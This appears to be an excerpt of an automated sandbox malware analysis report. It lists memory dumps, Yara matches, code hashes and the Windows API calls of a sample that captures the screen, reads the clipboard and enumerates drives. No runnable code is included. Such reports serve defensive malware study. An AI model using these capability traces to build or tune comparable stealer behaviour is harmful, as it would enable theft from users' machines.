                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                                  • Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction ID: 58cc46bcf82375073cf9f1fccaf16fe49708fa4818baf961fe28f3b6e69b91e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68D0A76158C7A10E57688D7894A087BFBF4E987516F18159EE4D1E7505D320EC028658
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction ID: b4d5876dbaadb47f9f5ad65dff3f7a46837e4539deee61aa2e4442b46f51b544
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5C04C69B6C4008A924CCB15AC5053562769BCB254715E029802A53255E2249467C94D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                                                  • Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                                                  • Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                  • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                                                  • API String ID: 2832541153-984153585
                                                                                                                                                                                                                                                  • Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                                                  • Instruction ID: 9ca23cb432bde1a05de5d33e8b270f16f5734af98b4d7fbb4d4ab31ec82b2115
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6415C7050C3818EE311EF78948831FBFE5AB92318F05096DE5DA86292D7B9C54CCBA7
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                  • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                                                  • API String ID: 2832541153-984153585
                                                                                                                                                                                                                                                  • Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                                                  • Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DrivesLogical
                                                                                                                                                                                                                                                  • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                                                                                                                                                                                                  • API String ID: 999431828-351939610
                                                                                                                                                                                                                                                  • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                                                  • Instruction ID: ac4f8ce3aab5b2b8f617ff33ccbee8af1ee55ceb7242ff7d826c92cd46e8b57c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC31E9B41493408FC310DF29C8A122BBBF2FFC1324F46981CE5964B620E7799946CF42
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 02196BF0
                                                                                                                                                                                                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 02196C11
                                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 02196C21
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 02196C28
                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 02196C37
                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02196C42
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 02196C4E
                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02196C71
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2843486406-0
                                                                                                                                                                                                                                                  • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                                  • Instruction ID: aeba686382dc3e3da61ee158c5a79e6fd115a1dc338c838dfb0e44fd20d838bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F214FB9544310EFE3509F609C49B2B7BF8EB8AB11F014929FA59A2290D77498048B67
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02185411
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID: +$e$+$e$XY$E#G
                                                                                                                                                                                                                                                  • API String ID: 237503144-1023387988
                                                                                                                                                                                                                                                  • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                                  • Instruction ID: ef03160bd06b48036711eb55c0c8a85e7f3824f1c709bba52bb364c3a2d744fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6521063424C344AFE3148F65E88175FBBE1EBC6714F25C92CE5A85B282D775C80A8F86
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02185B5B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                  • String ID: B"@$`J/H$rp
                                                                                                                                                                                                                                                  • API String ID: 237503144-3817236508
                                                                                                                                                                                                                                                  • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                                  • Instruction ID: 8b254b6acaa2395fe82655cce99bb6884917186355b3d30da07be6f2b0969c57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31CDB0E443489FDB10DFA9D8827DEBBB2EF45700F50002CE441BB295D6B55906CFA9